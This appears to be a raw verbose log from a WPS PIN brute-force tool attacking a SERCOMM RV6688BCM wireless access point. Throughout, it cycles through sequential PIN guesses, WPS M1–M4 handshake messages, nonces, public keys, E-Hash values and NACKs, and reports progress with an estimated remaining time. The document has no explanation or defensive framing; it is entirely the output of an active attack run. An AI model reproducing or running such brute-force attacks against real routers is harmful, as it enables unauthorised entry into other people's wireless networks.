[P] PKE: 71:e1:20:5c:56:62:fc:8c:81:80:8d:e3:6a:fe:05:1e:b7 :c6:da:20:18:63:60:02:66:07:b2:65:99:0c:d0:5d:f8:1 a:65:19:f2:44:7e:50:10:de:ef:4d:c4:a0:ae:3f:25:f0: 17:e1:db:f7:24:ed:a9:87:89:d8:e9:2f:dd:61:16:59:d5 :aa:09:0e:99:1b:48:c0:22:ac:c7:7f:18:5b:31:f3:00:4 7:62:ad:a8:52:e9:d0:b2:70:82:35:7e:e5:11:60:03:ba: 32:83:4f:ca:a6:07:a8:b4:40:fd:1a:cf:bd:b5:63:96:46 :84:22:e4:c1:5b:f3:16:bf:b0:01:33:92:75:0e:2f:c3:0 6:50:71:79:2d:5b:06:89:9b:d4:59:19:82:38:3d:01:d2: 0d:4c:65:b9:6d:38:01:77:eb:5a:4b:4a:0f:6a:5f:6a:96 :73:e5:9a:ea:d3:ec:cb:d6:f0:39:f5:ce:44:86:68:d4:c 0:67:4d:52:f0:41:62:d7:d7<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 6c:db:cc:9a:86:03:b5:9d:3b:cb:1b:08:11:b9:0e:aa<br/>
[P] PKR: c1:3d:27:a1:bc:4e:c7:e6:f5:91:5b:17:f1:0c:2a:bb:1b :ae:ec:14:96:09:6d:30:80:30:c4:6d:8c:a4:30:a8:54:a c:c7:dc:d2:85:52:d6:36:83:89:23:22:4a:26:83:74:4c: 4e:75:b5:67:9d:f7:57:ff:37:56:a0:9f:a2:eb:63:61:96 :7f:ab:63:1b:d4:9e:d3:a6:24:24:bc:0d:18:25:d2:99:c 1:ab:28:c5:49:3d:04:25:a1:ca:b8:6e:2d:64:c1:10:ae: 0b:1f:4b:29:29:b4:23:ec:4f:87:b6:cf:91:69:d8:92:8c :74:1e:9d:2c:2d:dc:b5:b3:ef:94:f6:2f:71:6d:d3:21:9 5:ca:59:b5:f8:e6:7f:8c:2e:e8:ba:e9:c8:07:bb:1e:58: bf:34:db:30:79:4f:dc:f1:bf:2a:dc:fd:32:5b:dd:b1:fa :ed:58:1b:bc:13:dc:8a:07:1f:84:df:d5:e7:d8:10:a4:0 c:d4:66:ba:0a:4c:78:38:a9<br/>
[P] AuthKey: e6:25:7e:ac:0f:64:cc:42:d1:57:0f:2e:52:f3:6d:01:35 :6e:32:67:a0:8e:67:c8:cd:a7:0b:e8:a0:bd:90:8b<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 80:80:f5:aa:c8:38:3b:b6:e6:d2:cb:a7:3b:7d:e4:94:e3 :82:bf:e5:76:51:00:c7:7e:22:33:56:50:ed:56:45<br/>
[P] E-Hash2: 21:8a:5b:09:a0:35:df:96:89:62:dd:19:75:e7:9f:ff:c0 :a9:63:6b:60:da:3f:2b:0d:1e:5e:29:30:af:d9:a4<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 54<br/>
[+] Pin count advanced: 54. Max pin attempts: 11000<br/>
[+] Trying pin 00435673.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 07:32:b0:f9:01:a6:9c:4e:3f:ae:41:de:24:05:94:a8<br/>
[P] PKE: 66:16:b2:4d:5b:8e:47:2e:bc:d9:9c:eb:57:c6:f1:f0:4c :a0:04:a0:42:0c:fd:ee:ec:35:24:2c:c4:42:45:cf:30:b 6:bd:50:d8:80:40:da:31:6d:99:79:ae:5d:5f:61:2a:09: 63:65:58:e1:4a:fc:87:24:c0:e2:9c:f1:2e:dc:f9:98:83 :29:a2:e7:79:ff:83:ea:1e:b9:87:8e:2d:ba:0a:3f:42:0 8:61:70:2a:b6:87:3d:23:fb:78:ca:6f:3d:35:5b:25:4b: f3:76:32:b5:fe:da:0b:27:a0:3a:68:c0:f0:1b:6d:19:c4 :29:2d:36:3b:3e:47:58:c9:18:26:b7:61:2a:47:85:32:7 4:3b:a3:8d:75:c1:6b:d5:fe:be:69:38:2b:25:30:e6:5b: 52:e7:6c:c5:2a:9a:e7:c6:80:c4:71:54:ee:4b:06:b8:32 :c7:58:2b:81:8b:80:c7:4f:89:63:24:25:ef:6d:f7:15:d 0:73:83:3f:93:b5:f9:8d:aa<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 8e:7b:df:b0:9b:c2:81:8c:a6:28:17:c1:00:33:10:d3<br/>
[P] PKR: 9c:d5:83:3c:72:77:a7:50:f2:4d:73:b6:50:19:ac:1b:aa :8b:db:93:0f:49:72:f4:9c:57:1a:37:f3:2e:e9:7c:ff:6 d:88:10:42:fd:96:e1:98:4b:47:c8:1b:14:c2:a4:e3:f8: cb:fa:15:36:db:c2:5f:ae:37:c4:51:c9:5f:2b:b8:52:b6 :ca:8c:5b:86:dd:bc:cd:93:71:c4:36:8e:c3:66:2f:65:f 0:5b:52:79:ac:fe:45:aa:24:e4:ce:c6:6b:d1:7a:ef:50: 72:fe:66:25:95:d9:a0:98:61:f9:46:f4:5c:20:a5:9d:3a :dc:ce:36:fd:b0:c2:3e:e7:c6:78:45:93:a6:f3:72:f8:e 8:68:35:6c:97:88:24:16:c4:1d:05:17:0e:a6:1d:0e:61: 8c:75:45:8d:8b:55:b2:81:a3:f8:95:82:95:ec:1b:5e:8a :3c:8a:37:c4:45:3e:40:bd:6a:41:82:cf:cc:27:88:37:6 5:54:f3:0f:47:1c:7b:dd:81<br/>
[P] AuthKey: 59:ae:61:09:3d:77:94:81:ae:38:e4:96:b6:01:b1:42:97 :e9:7f:2f:9d:d6:d3:cc:55:c1:f5:d0:ad:37:0d:b1<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: e0:85:e8:1d:2b:67:27:52:a9:96:e8:b5:34:01:84:96:22 :6d:b2:90:26:90:40:c4:86:97:4e:35:5a:56:f3:4c<br/>
[P] E-Hash2: 76:3c:a1:80:a2:dd:cb:39:ab:e9:6f:06:c4:a6:9b:26:d6 :f9:99:67:c4:2c:4a:01:c3:bc:57:94:1c:cc:a6:10<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 55<br/>
[+] Pin count advanced: 55. Max pin attempts: 11000<br/>
[+] Trying pin 00445672.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 22:56:aa:68:2a:c1:32:3a:0c:80:5e:87:35:40:14:49<br/>
[P] PKE: 7b:74:e0:5d:3c:8e:0d:0d:58:5f:ec:a8:5b:5c:3e:29:b8 :82:4f:37:50:bb:55:44:90:a4:91:c4:96:79:ee:4e:1f:7 e:2d:59:24:a5:a4:6f:8b:31:c7:65:07:4c:33:d0:d1:af: 8a:1f:49:d1:f2:da:33:46:4e:dd:50:ea:16:bf:59:a2:58 :f6:a1:c9:be:25:d7:9d:ca:a9:22:dc:77:60:a6:dd:85:7 d:c2:2c:b4:21:34:8a:2b:63:10:d5:10:8d:64:ee:f1:f2: 3d:f9:78:c4:99:41:2b:69:a8:51:c9:6f:5a:2b:01:88:dc :b4:c8:b8:f0:e8:7e:e8:a7:f3:9b:5c:44:60:9f:0b:22:d 7:bc:c9:8e:3f:15:95:da:15:bb:27:61:74:b5:7e:b1:2e: 0e:b0:5a:01:9b:d8:6a:02:65:80:dc:26:34:d7:40:1f:8d :11:51:01:e1:cc:44:7c:9e:64:7d:18:06:6b:73:60:14:4 c:8a:72:ed:d0:da:70:8b:b1<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: c1:e6:d7:48:2a:34:e9:cc:71:3f:42:b3:c6:5c:15:3a<br/>
[P] PKR: 85:ae:12:e9:3a:fc:c9:6c:19:99:44:92:e9:bd:2f:1f:21 :d4:85:10:32:0f:a4:2d:52:49:df:7a:00:2e:70:5f:81:f 4:e2:b8:84:4a:a9:af:d2:97:c2:dc:fe:0e:42:46:08:01: ac:2e:97:64:72:97:6d:74:20:0e:6e:44:99:05:ae:a0:aa :a6:2c:76:d8:37:8d:d2:95:74:57:53:95:98:86:0b:b7:c 1:c7:76:1b:18:e9:1d:cf:4d:d8:11:1c:35:13:bf:69:71: c3:8f:68:1a:1a:51:d5:63:e5:55:85:29:4c:b7:31:da:11 :0c:89:69:ab:97:83:6e:c3:9a:7e:a0:9c:58:42:e4:47:f 0:d5:fe:0e:1e:ba:9c:fa:c6:58:37:12:67:73:a4:93:7c: b6:08:4d:64:be:52:6a:e8:f7:09:9f:15:50:f9:e5:25:0c :29:51:c6:69:8b:d2:a9:5f:6f:e5:14:cd:57:73:68:ee:1 f:58:c1:4b:ee:7e:0e:df:ee<br/>
[P] AuthKey: 5b:a1:de:57:e7:50:7d:1e:3a:70:98:81:4e:67:88:81:5a :dd:7f:50:b2:0b:1e:72:f1:8e:7a:fb:f1:e9:30:40<br/>
[+] Sending M2 message<br/>
[+] Received M1 message<br/>
[+] Sending WSC NACK<br/>
[+] Sending WSC NACK<br/>
[!] WPS transaction failed (code: 0x03), re-trying last pin<br/>
[+] 0.50% complete. Elapsed time: 0d0h0m18s.<br/>
[+] Trying pin 00445672.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 23:ca:f8:94:1d:66:34:8b:5c:15:97:5e:54:77:d9:2c<br/>
[P] PKE: e7:49:d8:bd:ec:ca:b0:fe:f4:15:84:f0:b7:0b:56:a9:1f :b5:dc:25:50:f1:b5:7f:59:0d:dd:37:4f:1f:87:19:32:4 5:11:45:f4:26:8c:40:4e:2a:56:a4:63:2c:94:54:38:0d: 42:d8:46:72:9c:0d:98:46:b3:0e:6d:c3:c4:76:a6:e3:c2 :9d:35:bf:d3:60:ba:c7:35:88:17:bb:cf:62:46:ea:82:6 9:45:b1:ed:03:52:19:35:42:86:43:43:bf:95:bf:ea:95: b4:36:2b:d1:33:f4:34:b7:38:60:98:fc:fb:68:7e:71:59 :9f:a6:99:43:59:2c:bd:fe:34:3d:62:7f:7f:67:28:33:f b:a4:46:1d:a0:58:bb:a5:33:b7:e6:fa:8e:cb:ed:c1:05: fe:bb:39:86:b2:e9:69:7e:22:e5:54:e7:d7:78:a2:37:21 :83:4d:71:93:a4:4b:44:14:61:4e:8d:23:e2:c5:39:66:0 3:f9:a9:2a:83:5c:08:6d:fd<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 0e:b3:45:1e:7d:70:c1:ed:34:c5:6a:d7:34:a5:e2:c3<br/>
[P] PKR: 4d:63:3b:b3:5b:14:c8:f2:06:aa:93:2e:ce:ad:12:84:bd :15:0b:d3:af:34:51:7c:a1:02:4c:c3:6c:cf:dd:47:db:6 1:41:23:87:56:5f:6e:38:0d:f7:30:fd:2b:d3:34:4d:3a: 15:83:3c:a2:9a:f5:30:69:35:2d:92:a7:32:aa:78:41:50 :b9:74:44:ce:d6:57:74:c4:c1:0a:39:0d:c0:7e:82:9b:8 0:4a:e4:b5:4c:4a:dc:ef:f7:ea:64:5c:27:50:32:36:19: ee:a1:c0:00:00:3a:28:04:2b:8f:fc:57:3b:68:2f:9a:a2 :87:20:3c:28:1f:96:75:69:d9:9e:d9:8b:a7:bd:4f:7a:4 0:e3:fc:fe:e7:ea:ea:eb:e2:ef:b3:71:7a:1d:cf:2f:af: 60:e1:39:b3:74:0e:87:7f:e7:08:c6:95:fe:67:ca:3d:ad :ab:52:7a:65:b5:a6:8c:41:08:4b:72:b7:92:47:ed:b5:1 3:70:42:75:20:1e:24:0e:87<br/>
[P] AuthKey: 8c:de:b4:f7:a4:db:7b:88:a8:b1:39:70:b0:36:0f:6c:ce :14:31:d3:6d:50:de:5b:79:c2:61:12:05:5e:48:59<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: fd:fc:8f:41:c0:ce:76:bf:96:fb:54:85:99:58:bc:3e:fa :6e:67:b3:36:c2:76:12:90:ab:78:bc:14:46:48:ff<br/>
[P] E-Hash2: 7b:74:0f:b5:a3:30:ad:94:76:72:19:14:ad:41:ac:b4:ea :74:08:94:2c:db:00:b3:99:3c:59:2b:ae:de:72:da<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received M3 message<br/>
[+] Sending WSC NACK<br/>
[+] Sending WSC NACK<br/>
[!] WPS transaction failed (code: 0x03), re-trying last pin<br/>
[+] Trying pin 00445672.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 65:16:05:c1:4f:86:a2:90:6b:21:5f:76:33:7d:c3:f3<br/>
[P] PKE: 88:b7:55:67:3a:61:77:9f:64:70:d7:bd:37:57:d6:7a:e4 :f6:67:7a:bd:20:9f:25:dc:53:cc:63:4b:6f:7b:1a:a4:9 2:ec:83:6a:79:42:a8:48:3a:00:06:4e:7e:b9:05:bc:37: 8d:97:ff:70:ab:b0:d8:66:29:7d:c2:c2:4f:78:0f:d1:ba :f2:60:22:39:b3:88:4c:4a:a9:93:28:3f:d0:63:a9:39:b 6:7d:05:f0:5d:48:59:18:f9:1e:2e:24:84:e1:10:55:67: 1d:f4:65:52:2b:01:2b:8a:2d:56:ab:fe:83:5b:c0:3f:7a :d7:f9:96:63:5f:f8:03:ca:80:77:61:3c:3d:17:20:a5:1 3:42:3c:65:1a:ed:27:0a:5c:f1:55:57:d1:ee:be:c7:a7: 30:63:07:db:f7:25:0c:3b:fb:81:be:5f:ab:bd:d9:3a:4a :71:e5:63:fb:65:5b:6a:47:23:9e:77:0d:73:a5:c4:1d:7 f:12:2d:df:65:ec:ce:76:94<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: d2:b8:5d:87:2d:95:3c:f8:8c:d7:3b:36:e9:63:78:55<br/>
[P] PKR: f9:6f:c6:8c:02:b8:d9:36:7f:aa:a5:3b:f5:82:4b:7a:f2 :54:29:a3:10:61:a1:3c:74:85:54:c2:e3:b0:e1:25:43:7 f:5a:8d:1d:e3:5e:00:bd:3b:06:2f:88:9d:ef:74:91:b8: 1e:dd:3a:fe:7b:60:76:6c:46:dd:b8:9b:a5:d5:4b:98:7c :cb:96:db:4b:9b:a0:46:6c:fb:e3:b0:59:cc:d1:77:e0:b a:d7:75:9c:af:19:5e:62:d5:b5:37:a5:7a:0f:6e:91:74: bc:69:7f:39:1a:92:b8:34:8e:12:0d:a0:42:55:60:65:28 :96:2f:29:a2:15:22:13:98:e5:c9:62:38:29:b3:90:e8:e f:81:68:f4:17:4b:9c:25:e2:91:31:75:d6:16:cf:8e:e9: b9:07:ce:3e:ed:ff:05:e2:6b:af:8b:80:df:6b:c8:53:76 :7e:5b:5c:df:f0:98:50:64:e6:52:b6:2e:64:ea:c1:2a:4 f:d8:23:a2:20:fa:9b:97:56<br/>
[P] AuthKey: 93:f3:df:33:90:83:8f:c3:1f:c7:eb:c1:5c:f5:2c:67:57 :59:f7:0e:3d:d8:d3:c0:43:20:66:40:df:30:6e:eb<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: cb:d8:80:d6:48:bb:fc:6b:f8:1c:b1:2b:5a:ad:54:82:bd :fd:62:34:77:e3:b2:98:85:a2:d8:b7:39:87:61:46<br/>
[P] E-Hash2: 96:0e:63:03:ea:36:84:20:3a:b4:ca:69:ac:aa:17:06:74 :b1:15:d0:d5:9d:f7:59:36:30:91:8c:2e:1e:1f:8e<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 56<br/>
[+] Pin count advanced: 56. Max pin attempts: 11000<br/>
[+] Trying pin 00455671.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 40:a7:d3:c5:79:1b:d4:4c:38:a2:c5:7c:05:3f:66:70<br/>
[P] PKE: aa:40:d4:91:37:a4:0d:0e:b1:45:55:17:a0:47:21:75:93 :a0:0f:52:ce:42:a9:e7:fa:4d:87:1c:fe:fa:55:af:53:1 f:d4:14:8c:48:47:91:bb:d3:0e:d9:2e:40:1d:58:42:f7: 19:4f:1b:5e:a1:b5:ac:2a:8e:8c:ea:e3:5c:f1:3d:66:25 :05:d0:15:7d:b6:fa:14:fb:d4:4a:ca:1f:52:bb:95:5c:4 0:19:9f:54:7b:96:00:75:65:08:a0:5d:a7:96:d0:98:ad: 8a:51:46:16:be:c0:8e:5d:41:7c:f3:82:54:6a:ce:4a:18 :90:50:a8:b3:f7:8b:d8:d3:bc:2f:da:9a:c3:c3:8e:cd:0 0:d5:d5:84:01:22:a5:28:ad:ab:5f:51:b7:73:5e:00:4f: 35:bd:75:de:43:c6:45:a8:c9:28:f9:01:2b:68:87:a1:18 :ec:ed:ef:6d:cf:d7:74:65:3b:5e:b0:47:68:2d:20:ef:1 e:9b:07:46:7c:31:b1:ad:36<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 53:fc:0e:ed:ea:6a:98:b1:f2:60:81:c7:ef:8d:c9:33<br/>
[P] PKR: 71:3f:bb:03:32:93:57:00:03:bb:51:75:77:2b:ec:dd:31 :2d:db:b2:c7:e1:92:d5:a9:75:7b:f1:b2:76:ab:ff:4a:3 8:5e:33:68:17:ef:15:d4:8c:7d:0c:d9:ea:da:bb:a5:1e: ed:4c:97:af:b8:fd:c1:9e:bd:86:83:e4:dc:82:96:44:f9 :38:5c:25:1a:49:f7:dd:ce:bc:7c:f6:d1:3a:00:ee:55:8 9:db:0c:b5:d8:69:85:c5:28:57:60:02:60:1c:17:86:d0: 8d:dd:ec:89:c6:1a:cc:5f:12:07:d2:0e:3f:1c:a1:5c:66 :ab:bc:78:b6:14:60:73:60:4d:9f:4b:d4:6e:e6:65:f1:d 4:f8:e4:10:0e:f0:f0:25:b6:cc:07:b2:c8:af:ff:49:7d: 7d:52:1f:6e:38:c5:d7:94:e3:e7:6e:aa:09:38:70:66:37 :e0:53:d2:9b:48:0b:b9:02:5d:f3:22:cc:58:8d:5e:02:e 9:82:8e:52:8f:f8:b4:10:d8<br/>
[P] AuthKey: 21:d5:dc:99:75:9b:2d:3a:6d:38:fe:6f:27:e6:b3:1f:ab :75:e8:53:b6:e0:a2:cc:49:19:cf:af:8c:3f:04:78<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 84:10:22:6e:30:cb:66:95:38:ac:02:a5:f9:6b:f8:40:70 :25:df:73:02:86:ab:a9:48:0c:d1:69:2b:60:de:fd<br/>
[P] E-Hash2: 80:1e:35:af:f6:ae:5f:73:3f:44:6a:b1:51:b2:4b:42:dd :8e:bc:b2:7e:12:2e:89:fb:38:17:96:eb:5c:2b:f0<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 57<br/>
[+] Pin count advanced: 57. Max pin attempts: 11000<br/>
[+] Trying pin 00465670.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 0a:88:9c:43:57:eb:22:b9:6d:1b:f2:25:40:7b:d4:5d<br/>
[P] PKE: b3:07:a6:ee:58:8c:c8:da:27:9d:9a:65:3f:be:94:c0:20 :a4:e2:74:af:68:1c:14:81:15:17:b1:f9:28:33:2d:be:3 2:2f:f1:49:5b:2d:76:23:2b:be:1a:38:20:41:6e:2d:f1: d7:1f:7b:c9:be:2d:60:69:64:24:be:4d:91:fa:22:9f:da :74:36:b3:e4:e2:57:81:eb:96:0a:e3:e1:ae:f6:5c:f6:4 b:74:27:7b:f7:d8:d7:79:f2:03:13:75:b1:af:6a:f2:69: cd:89:37:95:8c:f6:bc:71:9c:5c:5d:83:ec:3d:cf:25:cc :54:12:71:c1:6a:d0:2c:ac:aa:05:81:72:bf:ee:27:c0:d 2:e1:02:69:db:98:19:25:52:c2:27:38:ed:47:c2:85:7b: cf:d0:84:a0:44:1c:75:38:3a:9d:6e:26:f5:99:44:54:5b :13:09:5d:ce:87:07:f1:af:57:b8:bb:ea:dc:92:cd:7c:2 c:a5:4f:d7:bd:92:be:19:b7<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: fa:75:ad:9e:c8:5d:7d:55:b0:1f:14:53:5d:99:8c:83<br/>
[P] PKR: b7:b7:a8:76:b9:89:ad:c1:59:b0:be:7c:56:7e:08:e8:ca :4c:d4:44:51:c2:48:e2:98:f4:23:89:dd:48:dc:89:89:8 4:2f:f5:d1:c6:2e:11:ab:ad:1c:fe:30:58:02:20:78:3c: 8b:c4:d0:70:6a:1b:15:40:0a:75:ff:e7:a9:a8:f5:34:c9 :be:d8:bf:de:88:22:97:9d:1c:49:28:40:52:39:39:db:3 b:25:66:6f:9b:b9:5f:5a:c6:e7:af:e4:3b:b7:fe:1d:30: ac:0c:06:a3:61:b5:29:34:0c:c5:9e:cf:1b:2b:b4:10:9e :79:0d:f3:22:9e:61:9c:2d:8d:5e:23:32:0b:04:09:68:1 6:12:af:98:c5:89:d3:6c:f5:52:f1:c6:47:c5:41:50:ef: 2c:c4:77:99:15:b0:48:5c:a9:81:69:e5:97:4d:4a:78:31 :ae:59:64:21:a6:d9:b5:b5:f3:0c:4f:a4:ce:8a:2a:37:9 7:71:dc:16:7f:7c:43:3a:9d<br/>
[P] AuthKey: 24:8d:2e:30:f4:d8:3f:42:9a:f1:78:a6:a8:c4:f8:51:db :1c:ca:15:d1:01:cb:dd:1b:ea:7d:91:11:7b:45:e7<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: 6b:cd:5c:f4:ef:9b:3f:d3:98:f9:2b:0e:7e:76:9a:97:0d :c2:bf:93:ad:83:88:89:c6:4e:77:fc:21:dd:ed:de<br/>
[P] E-Hash2: 45:79:ad:91:76:22:01:95:6f:d7:7d:bb:ed:c4:3f:3c:f5 :b7:f0:a8:5b:1c:d2:68:87:75:66:a4:f1:49:4c:a7<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 58<br/>
[+] Pin count advanced: 58. Max pin attempts: 11000<br/>
[+] Trying pin 00475679.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 65:e7:01:a6:01:44:34:90:3a:36:6d:e7:11:fc:b9:81<br/>
[P] PKE: e0:81:f5:3e:18:9d:d8:2f:d8:2f:eb:e3:c6:29:37:05:04 :f5:4d:2e:07:80:af:c0:f5:9e:b3:93:84:f3:88:e8:8d:e 9:11:2c:23:60:ad:32:76:f3:d7:eb:0f:f5:59:15:e4:96: 8d:e1:25:70:cd:6f:48:08:5a:ea:71:d6:88:35:bd:b1:2a :45:8a:90:90:8c:bc:dc:d3:fd:73:62:ef:f1:42:e4:2e:2 9:1f:a8:8a:c7:d1:0c:6c:ef:91:a4:70:96:26:3c:48:4a: df:48:97:14:2d:38:1a:6b:ae:41:2f:10:8f:60:5e:ab:17 :36:d5:10:fa:8b:52:27:99:cf:20:c9:9d:11:56:0d:dc:b f:41:d7:47:be:d9:94:e9:ce:f6:b5:b3:38:22:5c:e5:33: 67:a9:e8:86:9a:cd:4c:2a:63:0d:3a:4f:0d:83:d8:0e:b6 :ab:d0:f5:fc:3c:a6:08:94:66:5f:86:3e:15:9c:1f:a0:e 1:ea:49:28:d8:bf:d0:db:13<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: e6:22:ad:bc:e3:34:7c:fb:26:fd:9b:42:ae:ea:16:dc<br/>
[P] PKR: 9a:0b:0a:1b:f2:0d:26:7e:fa:b5:44:81:35:93:86:67:2a :16:01:01:85:c9:ea:88:2e:51:ee:26:ac:89:3e:f5:f6:9 f:63:6c:96:df:93:2c:bf:02:27:d5:8a:b5:c6:9c:88:36: 52:41:34:6f:5c:84:66:bf:79:f9:39:f6:f1:ba:d4:d6:a7 :1c:65:f4:b2:cd:0f:63:33:cd:da:88:8a:e0:7c:16:c0:9 3:81:4e:89:e4:4b:91:c0:a3:27:f8:bf:be:02:7f:36:99: 0c:d4:75:e9:7b:03:f7:60:31:97:c4:01:19:b4:1a:e3:e3 :9c:82:6b:03:45:f1:d6:0e:1b:5c:eb:90:3c:1c:94:c9:7 a:cc:41:cc:ac:fc:f5:1c:67:a8:c4:92:20:19:f2:fa:c2: 08:c7:04:66:bc:c2:ae:3c:cd:e6:51:19:d4:45:03:63:47 :77:ff:4c:50:84:db:23:6a:4b:87:5d:43:18:cb:b1:73:3 e:05:99:dd:cb:82:e9:4e:d4<br/>
[P] AuthKey: 83:6c:0e:4d:71:68:90:dd:a1:6d:57:f3:6f:f8:3b:56:5b :c5:5c:98:3e:ce:71:8e:0e:6f:6b:18:51:a7:fc:b5<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: e2:42:3f:9a:7c:d4:ca:05:b1:51:d0:c6:cc:d9:e1:41:8d :00:46:27:3f:19:28:f4:c0:68:98:89:c1:ab:da:99<br/>
[P] E-Hash2: 05:4e:7a:8c:68:64:f4:11:81:6f:c0:cc:80:4b:ef:e1:4d :73:29:33:66:3e:ca:68:e4:c2:57:ee:cc:7e:e8:b0<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 59<br/>
[+] Pin count advanced: 59. Max pin attempts: 11000<br/>
[+] 0.54% complete. Elapsed time: 0d0h0m34s.<br/>
[+] Estimated Remaining time: 0d12h9m24s<br/>
[+] Trying pin 00485678.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 41:95:46:30:2a:de:dd:6e:07:82:19:c2:63:da:92:fb<br/>
[P] PKE: 2b:12:57:5a:84:8c:7a:9e:cc:29:f3:05:db:d2:fb:18:ec :43:e9:13:5d:8d:bd:a2:e7:5f:64:3f:32:1b:34:13:89:a 2:06:31:35:17:40:ab:8e:e7:fc:36:84:d4:1a:17:75:d3: 24:39:b4:f7:8e:fb:9f:f1:7d:57:c3:d7:6f:5e:19:a9:56 :48:28:cd:e8:11:ee:4d:90:0f:d8:7b:99:65:87:04:de:1 d:d5:dc:a9:54:38:64:07:69:23:f6:b3:78:6a:d0:0e:a4: c4:7c:8a:6b:f3:80:9b:f5:9c:96:e6:09:45:79:c5:c8:70 :01:76:b9:dc:12:67:60:0c:b5:13:7e:de:fb:11:40:a7:5 0:a8:77:fc:91:4e:f8:02:6b:05:a7:b9:39:d5:55:62:23: 9c:8a:e0:53:96:c7:05:14:a6:1c:46:32:3d:af:01:2d:d0 :07:49:23:ea:69:fb:b1:09:d5:3f:a0:4a:cf:54:2b:53:e a:63:f5:c8:66:29:cd:f8:47<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: 82:ea:3b:45:38:1a:d8:cc:00:44:7f:5c:5b:c8:02:32<br/>
[P] PKR: d8:a0:ca:3e:07:c4:9c:14:db:2c:00:78:b4:60:f9:27:b6 :0e:c7:b6:79:e5:48:6c:ff:24:39:e2:b8:aa:36:73:94:f 6:df:b0:a1:3d:25:d6:e2:2a:69:04:bf:0f:11:6b:20:ab: 6a:dc:48:5f:99:d3:ea:51:9a:a9:ed:91:8c:a8:f7:79:3e :20:7a:fa:34:44:44:b0:98:c9:7f:d2:a4:96:85:b5:ec:1 7:4d:83:57:5b:1b:bd:61:a7:0c:af:7d:d2:44:4c:f2:aa: 49:0c:bf:69:b3:72:0b:dd:5e:2a:47:9f:3e:61:0a:b8:ae :bc:59:73:77:48:51:66:cf:3e:33:01:af:97:51:31:98:c 1:eb:db:ec:35:46:96:4d:10:a2:c7:e3:92:db:3e:2c:31: e0:08:c6:bf:93:35:c4:82:35:9e:c6:a8:1e:12:95:bb:e3 :bb:3d:38:1d:1d:25:38:81:a7:5d:96:51:54:fa:2b:86:6 4:6f:10:eb:4a:9f:06:a6:02<br/>
